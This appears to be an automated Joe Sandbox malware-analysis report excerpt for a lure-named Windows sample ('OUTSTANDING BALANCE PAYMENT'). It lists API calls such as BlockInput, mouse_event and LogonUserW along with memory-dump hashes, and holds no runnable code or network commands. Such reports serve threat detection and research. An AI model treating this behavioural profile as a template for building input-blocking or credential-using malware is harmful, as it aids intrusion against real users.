                                                            • Part of subcall function 00B8344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00BABDC3,00000000,?,?,?,?,00BABF70,00000000,?), ref: 00B83453
                                                            • Part of subcall function 00B8344A: __aulldiv.LIBCMT ref: 00B83473
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                          • String ID:
                                                          • API String ID: 2893107130-0
                                                          • Opcode ID: d3f03c28bfc676d1a7c90a656e345e6c536520b06ae26477a612ebf914f29d64
                                                          • Instruction ID: 19ee1d31b6d7e7fdfae09a5578d4589e009e697775e96dada3d6720161d68265
                                                          • Opcode Fuzzy Hash: d3f03c28bfc676d1a7c90a656e345e6c536520b06ae26477a612ebf914f29d64
                                                          • Instruction Fuzzy Hash: CF2172726345108BC729CF28C491B96B7E1EB95310B248E7DE4E5CB2D1CB78BA06DB54
                                                          APIs
                                                          • BlockInput.USER32(00000001), ref: 00BB6ACA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          • Opcode ID: 4eb64ae49f78f1914c133464183a57a86343254cc484046824a9df97e30cc9c2
                                                          • Instruction ID: 34f424afcfe1fea166fc0dd0c080a1a77bf6c99af5fbd2dbcd4f533a429507a9
                                                          • Opcode Fuzzy Hash: 4eb64ae49f78f1914c133464183a57a86343254cc484046824a9df97e30cc9c2
                                                          • Instruction Fuzzy Hash: 49E012353102046FD700EB69D844996B7ECEF74751F04C456E945D7261DAF4E8048B90
                                                          APIs
                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00BA74DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID:
                                                          • API String ID: 2434400541-0
                                                          • Opcode ID: 5d453fef3494f49c51e92478e4beaa2cb12060318fed219a14b35d7d4a398e98
                                                          • Instruction ID: 81b13459b0360fa2ca66b72db87d988cc6fb8ac70c29c06e677fdc46dc2d1bfe
                                                          • Opcode Fuzzy Hash: 5d453fef3494f49c51e92478e4beaa2cb12060318fed219a14b35d7d4a398e98
                                                          • Instruction Fuzzy Hash: C7D09EA56EC70579FD2907249C5FF7619C8F30A7C1F9491C9B582CA6C3BCD458469132
                                                          APIs
                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B9AD3E), ref: 00B9B124
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: LogonUser
                                                          • String ID:
                                                          • API String ID: 1244722697-0
                                                          • Opcode ID: 94beaf83e03836ff75f2e877be9fc514bec272abc2f524ef677863c59d85c72c
                                                          • Instruction ID: 98478a67ff078f2d5da852e8661f988c64d0df246348304aa2533695cd3046a7
                                                          • Opcode Fuzzy Hash: 94beaf83e03836ff75f2e877be9fc514bec272abc2f524ef677863c59d85c72c
                                                          • Instruction Fuzzy Hash: 62D09E321A464EAEDF025FA4DC06EAE3F6AEB04701F448511FA25DA4A1C675D531AB50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 4af125bace4d8327b566c72320003e421f87ddaa86557ec3979a7ce5657e956e
                                                          • Instruction ID: 3c936e965291d19cf5f7bd2e0a0d88d638e5a13734318eab836cd539a842f4ba
                                                          • Opcode Fuzzy Hash: 4af125bace4d8327b566c72320003e421f87ddaa86557ec3979a7ce5657e956e
                                                          • Instruction Fuzzy Hash: 95C04CB1400159DFC751CBC0CD849EEB7BCAB04301F1440929105F2110DB709B459B72
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B8818F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 842cdc8b21f1ea1277a42e3a38b91e3f7c520cd5bbff25d82d2b7a497e9ac567
                                                          • Instruction ID: cab4225cde725f14d1c9e79cd9e2d163a748c9998fd21db4d24f2910770f59da
                                                          • Opcode Fuzzy Hash: 842cdc8b21f1ea1277a42e3a38b91e3f7c520cd5bbff25d82d2b7a497e9ac567
                                                          • Instruction Fuzzy Hash: 17A0223200020CFBCF002F82FC088883F2CFB002A0B000020F80C0A030CFB3A8208ACA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e4557d52fbc4e42fe8582d3e12721e8dec0b83ebc528f93cc8c9fccf8ab6dc25
                                                          • Instruction ID: 40ba239f6cb8f58776bee63a428b93b5439d343e38e7606e16e5006878c776e2
                                                          • Opcode Fuzzy Hash: e4557d52fbc4e42fe8582d3e12721e8dec0b83ebc528f93cc8c9fccf8ab6dc25
                                                          • Instruction Fuzzy Hash: F0126A70A002099FDF14DFA5D981AAEF7F9FF58300F1085A9E816E7254EB3AAD11CB54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throwstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 3728558374-0
                                                          • Opcode ID: c0656a924663d641f4231064a2be72104f357377e696b029f060fbaae535c7e2
                                                          • Instruction ID: 2f017be0d4d0fda315eb8b2f4a44602674761139a513ee6bd8ac6f5aba0642a8
                                                          • Opcode Fuzzy Hash: c0656a924663d641f4231064a2be72104f357377e696b029f060fbaae535c7e2
                                                          • Instruction Fuzzy Hash: 21029070A00205DBCF04DF64D991AAEBBF5EF49300F14C4AAE80AEB355EB35DA55CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                          • Instruction ID: a8a79c998e4ec539f704edfbb13b26db5195fbdf1963d82ed6c59dc166337b46
                                                          • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                          • Instruction Fuzzy Hash: 43C1B0322151930ADB6D5639C47443EBAE19BA27F131A07FDD8B7CB5E5EE20C528D720
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                          • Instruction ID: d84918b37a205c0b65d179cf3d587474db9251a3e2c958bab6ca462ae1a363bd
                                                          • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                          • Instruction Fuzzy Hash: ADC1A03621519309DBAD5639C47443EBAE19BA2BB131A07BDD4B7CB4E5EE20C928D720
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction ID: 486069a6eea3f0b012d53a42780287c114a009cb7aa267ee3ac3410e33b34f27
                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction Fuzzy Hash: 2DC16E3220909309DF2D4679C47443EBAE1DBA2BB131A87FDD8BBCB5D5EE20C564D624
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2035330255.00000000016B4000.00000040.00000020.00020000.00000000.sdmp, Offset: 016B4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16b4000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                          • Instruction ID: f291176842d4fe3efa43556883d450408be3bc94f5d74d2db1adcf6b8098da9d
                                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                          • Instruction Fuzzy Hash: 7341C271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2035330255.00000000016B4000.00000040.00000020.00020000.00000000.sdmp, Offset: 016B4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16b4000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                          • Instruction ID: fde300c9d4a37b3477bac35f871f146f0a17f6f3dd33f9ab43920ce52d5b7f73
                                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                          • Instruction Fuzzy Hash: AC019279A01209EFCB45DF98C5909AEF7B6FB88310F208599D809A7741D730AE81DB80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2035330255.00000000016B4000.00000040.00000020.00020000.00000000.sdmp, Offset: 016B4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16b4000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                          • Instruction ID: a6631ff1de16f4ae73fb856bc4abb6f6a5ad57b828211d5526cbed2b07c2ee92
                                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                          • Instruction Fuzzy Hash: 46014279A01209EFCB44DF98C9909AEF7F5FB88310F208599D819A7745D730AE91DB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2035330255.00000000016B4000.00000040.00000020.00020000.00000000.sdmp, Offset: 016B4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16b4000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 00BBA2FE
                                                          • DeleteObject.GDI32(00000000), ref: 00BBA310
                                                          • DestroyWindow.USER32 ref: 00BBA31E
                                                          • GetDesktopWindow.USER32 ref: 00BBA338
                                                          • GetWindowRect.USER32(00000000), ref: 00BBA33F
                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00BBA480
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00BBA490
                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA4D8
                                                          • GetClientRect.USER32(00000000,?), ref: 00BBA4E4
                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BBA51E
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA540
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA553
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA55E
                                                          • GlobalLock.KERNEL32(00000000), ref: 00BBA567
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA576
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00BBA57F
                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA586
                                                          • GlobalFree.KERNEL32(00000000), ref: 00BBA591
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA5A3
                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00BED9BC,00000000), ref: 00BBA5B9
                                                          • GlobalFree.KERNEL32(00000000), ref: 00BBA5C9
                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00BBA5EF
                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00BBA60E
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA630
                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA81D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                          • API String ID: 2211948467-2373415609
                                                          • Opcode ID: a1361ff11f3ca4c46567492b462e7e49fd18c1053c2029d7a706ee90334f9370
                                                          • Instruction ID: 82abef134c002520e0fa276fbc85bf44c792785265adaa3a419b68f84318b415
                                                          • Opcode Fuzzy Hash: a1361ff11f3ca4c46567492b462e7e49fd18c1053c2029d7a706ee90334f9370
                                                          • Instruction Fuzzy Hash: 39026D75A10254EFDB14DFA4CD89EAE7BF9EB48310F048198F905AB2A0CBB4DD41CB61
                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 00BCD2DB
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00BCD30C
                                                          • GetSysColor.USER32(0000000F), ref: 00BCD318
                                                          • SetBkColor.GDI32(?,000000FF), ref: 00BCD332
                                                          • SelectObject.GDI32(?,00000000), ref: 00BCD341
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00BCD36C
                                                          • GetSysColor.USER32(00000010), ref: 00BCD374
                                                          • CreateSolidBrush.GDI32(00000000), ref: 00BCD37B
                                                          • FrameRect.USER32(?,?,00000000), ref: 00BCD38A
                                                          • DeleteObject.GDI32(00000000), ref: 00BCD391
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00BCD3DC
                                                          • FillRect.USER32(?,?,00000000), ref: 00BCD40E
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BCD439
                                                            • Part of subcall function 00BCD575: GetSysColor.USER32(00000012), ref: 00BCD5AE
                                                            • Part of subcall function 00BCD575: SetTextColor.GDI32(?,?), ref: 00BCD5B2
                                                            • Part of subcall function 00BCD575: GetSysColorBrush.USER32(0000000F), ref: 00BCD5C8
                                                            • Part of subcall function 00BCD575: GetSysColor.USER32(0000000F), ref: 00BCD5D3
                                                            • Part of subcall function 00BCD575: GetSysColor.USER32(00000011), ref: 00BCD5F0
                                                            • Part of subcall function 00BCD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BCD5FE
                                                            • Part of subcall function 00BCD575: SelectObject.GDI32(?,00000000), ref: 00BCD60F
                                                            • Part of subcall function 00BCD575: SetBkColor.GDI32(?,00000000), ref: 00BCD618
                                                            • Part of subcall function 00BCD575: SelectObject.GDI32(?,?), ref: 00BCD625
                                                            • Part of subcall function 00BCD575: InflateRect.USER32(?,000000FF,000000FF), ref: 00BCD644
                                                            • Part of subcall function 00BCD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BCD65B
                                                            • Part of subcall function 00BCD575: GetWindowLongW.USER32(00000000,000000F0), ref: 00BCD670
                                                            • Part of subcall function 00BCD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BCD698
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 3521893082-0
                                                          • Opcode ID: c6d53551af9b3bb6fd55a9faf8e5ac0ce1ff13f8cca48343b581074f85d0409e
                                                          • Instruction ID: 1113c15764c0a9f655d0f2ce1dc0ce4bb00fcaf0ce32dbc256300623a4ec2af7
                                                          • Opcode Fuzzy Hash: c6d53551af9b3bb6fd55a9faf8e5ac0ce1ff13f8cca48343b581074f85d0409e
                                                          • Instruction Fuzzy Hash: 97916E71408341AFD7109F64DC88E6B7BE9FF85325F100A2DF9669B1A0DBB1D944CB52
                                                          APIs
                                                          • DestroyWindow.USER32 ref: 00B7B98B
                                                          • DeleteObject.GDI32(00000000), ref: 00B7B9CD
                                                          • DeleteObject.GDI32(00000000), ref: 00B7B9D8
                                                          • DestroyIcon.USER32(00000000), ref: 00B7B9E3
                                                          • DestroyWindow.USER32(00000000), ref: 00B7B9EE
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00BDD2AA
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BDD2E3
                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00BDD711
                                                            • Part of subcall function 00B7B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B7B759,?,00000000,?,?,?,?,00B7B72B,00000000,?), ref: 00B7BA58
                                                          • SendMessageW.USER32 ref: 00BDD758
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BDD76F
                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00BDD785
                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00BDD790
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
